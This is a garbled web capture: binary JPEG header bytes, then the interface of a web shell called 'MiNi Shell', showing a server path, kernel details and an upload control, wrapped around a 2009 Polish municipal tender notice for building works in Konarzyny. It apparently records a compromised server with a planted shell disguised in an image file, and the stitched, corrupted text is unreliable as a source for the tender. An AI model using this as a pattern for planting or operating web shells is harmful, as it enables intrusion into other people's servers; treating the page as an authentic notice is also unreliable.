JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090828/297720-N-2009.html

<p class="kh_header"><b>Konarzyny: Rozwój infrastruktury społeczno-kulturalnej poprzez rozbudowę Gminnego Ośrodka Kultury, budowę ciągu pieszo-jezdnego przy boisku rekreacyjno-sportowym i przebudowę parkingu w Konarzynach.</b><br>
<b>Numer ogłoszenia: 297720 - 2009; data zamieszczenia: 28.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Konarzyny , ul. Szkolna 7, 89-607 Konarzyny, woj. pomorskie, tel. 059 8331011, 8331008, faks 059 8331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konarzyny.pl , http://bip.konarzyny.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozwój infrastruktury społeczno-kulturalnej poprzez rozbudowę Gminnego Ośrodka Kultury, budowę ciągu pieszo-jezdnego przy boisku rekreacyjno-sportowym i przebudowę parkingu w Konarzynach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest rozbudowa Gminnego Ośrodka Kultury-budynku gospodarczego wraz z węzłami sanitarnymi i węzłami budowlanymi z tym związanymi  oraz budowa ciągu pieszo-jezdnego przy boisku rekreacyjno-sportowym i przebudowa parkingu w Konarzynach . 
2.Ww. roboty obejmują: 
a)Rozbudowa  Gminnego Ośrodka Kultury:
-budowa budynku jedno kondygnacyjnego z dachem jednospadowym kryty   blachodachówką w kolorze wiśniowym.
-część projektowa: 
- powierzchnia zabudowy	-   71,50 m2 ;
- powierzchnia użytkowa	-   58,71 m2 ;
- kubatura 			- 357,50 m3 ,
- ławy z betonu B15;
- ściany zewnętrzne grubość 24 cm. na zaprawie cementowo- wapiennej, ocieplone od zewnątrz styropianem gr. 10 cm. ;
-ściany wewnętrzne działowe gr.12 cm. ;
-wieńce żelbetowe z betonu klasy B15;
-stolarka okienna i drzwiowa PVC;
-ściany zewnętrzne ocieplone systemem ATLAS ;
-parapety wewnętrzne wykonane z płyt MDF;
-parapety zewnętrzne z blachy ocynkowanej;
-pokrycie dachu blachodachówką;
-poliwęglan jednokomorowy ;
-elewacja;
-instalacja :
wod. -kan.
-co , c w u 
-elektryczna;
-wszystkie przyłącza do budynku są istniejące ( wod.-kan. , elektryczne);
b)ciąg pieszo-jezdny :
-rozbiórka elementów z płyt jumbo ( 250 szt.) i przetransportowanie na odległość do 200 m oraz rozbiórka 70 m2 asfaltu;
-ułożenie polbruku (80mm) wraz z podbudową -914 m2 .
c)przebudowa parkingu w Konarzynach:
-ułożenie kostki betonowej  POLBRUK( 60 mm ) wraz z podbudową -432,52 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.30.00.00-0, 45.31.00.00-3, 45.22.33.00-9, 45.23.32.50-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 8.000,00 PLN (Słownie: osiem  tysięcy złotych 00/100).
2.	W zależności od woli wykonawcy wadium może być wnoszone w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy Pzp.
3.	W przypadku wnoszenia wadium w pieniądzu ustalona kwotę należy wpłacić przelewem do dnia 18 września  2009 r. do godz. 10.00 na konto Urzędu Gminy Konarzyny : Bank Spółdzielczy w Bytowie  Oddz. w Konarzynach 61 9321 0001 0020 6226 2000 0010 z adnotacja: (Wadium nr sprawy ZP 3410 -03/2009 ) (decyduje data uznania wpłaty na koncie zamawiającego). Kserokopie dowodu wpłaty należy dołączyć do oferty.
4.	W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach dokument wadium należy dołączyć do oferty. 
5.	Wadium w przypadku wykonawców działających wspólnie może być wniesione przez jednego z wykonawców - pełnomocnika, z zaznaczeniem że jest przez niego wnoszone w imieniu wykonawcy.
6.	Wadium wnoszone w formie gwarancji winno zawierać w swej treści:
a)	nieodwołalne i bezwarunkowe zobowiązanie się do zapłaty kwoty wadium na wypadek gdyby Wykonawca:
-odmówił podpisania umowy na warunkach określonych w ofercie,
-	nie wniósł zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
b)	dokładne określenie przedmiotu postępowania,
c)	kwotę zobowiązania,
d)	termin ważności,
e)	klauzule dodatkowe np. nakazujące zwrot dokumentu po jego wygaśnięciu.
7.	Pozostałe formy wniesienia wadium winny zawierać wszystkie elementy wynikające z odnośnych i obowiązujących przepisów.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadają niezbędną wiedze i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
-Wykonawca musi wykazać, że wykonał co najmniej dwie roboty budowlane (w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie) rodzajowo i wartościowo porównywalna z przedmiotem niniejszego zamówienia - należy przez to rozumieć budowę, a także prace polegające na przebudowie, remoncie budynku o wartości co najmniej 500.000,00 zł brutto i kubaturze min. 1000,00 m3.
- Wykonawca musi posiadać odpowiednia kadrę niezbędną do wykonania przedmiotowego zamówienia, tzn. 
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - suma ubezpieczenia nie może być niższa niż 500.000,00 zł.

4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy -Prawo zamówień publicznych (pzp).

2.	Każdy uczestnik wspólnej oferty musi spełniać warunek określony w pkt 1 ppkt 1) i ppkt 4) siwz. Przy ocenie spełnienia pozostałych warunków zamawiający weźmie pod uwagę łączny potencjał podmiotów.

3.	Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły -spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.	Oświadczenia lub dokumenty wymagane od wykonawcy na potwierdzenie spełniania warunków:
1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu - wg wzoru określonego w załączniku Nr 2.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie
zamówienia publicznego ww. dokument musi być złożony przez każdego Wykonawcę. 

2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być złożony przez każdego Wykonawcę. 

3)	Dokument stwierdzający, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają: 

a)	wymagane uprawnienia budowlane do kierowania robotami w zakresie ogólnobudowlanym (kierownik budowy);
b)	uprawnienia budowlane instalacyjne w zakresie sieci, instalacji i urządzeń elektrycznych (kierownik robót);
c)	uprawnienia budowlane instalacyjne w zakresie sieci, instalacji i urządzeń sanitarnych (kierownik robót). 

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być złożony przez tego Wykonawcę, który dysponuje ww. osobami. 

4)	Zaświadczenie o członkostwie w Izbie Inżynierów Budownictwa osób posiadających wyżej wymagane uprawnienia (opisane w pkt 3).

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być złożony przez tego Wykonawcę, który dysponuje ww. osobami.  

5)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru określonego w załączniku Nr 5.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być zło7ony przez tego Wykonawcę, który dysponuje ww. osobami. 

6)	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5) Wykonawca wskazał osoby, którymi będzie dysponował 


7)	Wykaz podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat zakresu wykonywanych przez nich czynności oraz ich wartości - wg wzoru określonego w załączniku Nr 6. 

(w przypadku braku podwykonawców należy wpisać-nie dotyczy-). 

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być złożony przez tego Wykonawcę, który dysponuje ww. podmiotami. 

8)	Wykaz wykonanych robót budowlanych (w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) rodzajowo i wartościowo porównywalnych z przedmiotem niniejszego zamówienia - należy przez to rozumieć budowę, a także prace polegające na przebudowie, remoncie budynku o wartości co najmniej 500.000,00 zł brutto i kubatury min. 1000,00m3 z podaniem wartości, daty i miejsca wykonania oraz dokumenty potwierdzające, że roboty  te zostały wykonane należycie - wg wzoru określonego w załączniku Nr 4.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być złożony przez tego Wykonawcę, który  zrealizował roboty. 

9)	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 500.000,00 zł.

 W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia publicznego ww. dokument musi być złożony przez Wykonawców i zostanie uznany za spełniony jeżeli wykonawcy będą spełniać go łącznie.

Uwagi:
-ww. dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku składania elektronicznej kopii dokumentów powinny być one oparzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu,
-w przypadku składania kserokopii poświadczonej za zgodność z oryginałem należy stosować uregulowania zawarte w rozdziale IX pkt 5 i 7 siwz.

Jeżeli wykonawca ma siedzibie lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z § 2 pkt 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605).

5.	Inne dokumenty wymagane od wykonawcy:

1) Wypełniony formularz ofertowy - druk OFERTA - wg załącznika nr 1 do siwz.
2) Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu Wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku, o którym
mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 3 do siwz.
3) Harmonogram rzeczowo-finansowy wg załącznika nr 8 do siwz z wyszczególnieniem wartości planowanych robót w poszczególnych miesiącach.
4) Kosztorys ofertowy.
5) Parafowany na każdej stronie wzór umowy - wg załącznika nr 7 do siwz.
6. Oferty wspólne przedstawione przez wykonawców, jako partnerów, będą musiały spełniać
następujące wymagania:
a)	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców;
b)	wszyscy Wykonawcy będą ponosić odpowiedzialność solidarna za wykonanie umowy zgodnie z jej postanowieniami;
c)	Wykonawcy ustanawia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - zgodnie z art. 23 ust. 2 upzp, 
d)	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości od wszystkich Wykonawców łącznie lub od każdego z osobna,
e)	Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współprace Wykonawców działających wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.konarzyny.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Konarzyny  , ul. Szkolna 7 , 89-607 Konarzyny  pok. nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2009 godzina 10:00, miejsce: Urząd Gminy Konarzyny, ul. Szkolna 7, 89-607 Konarzyny.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 18.10.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com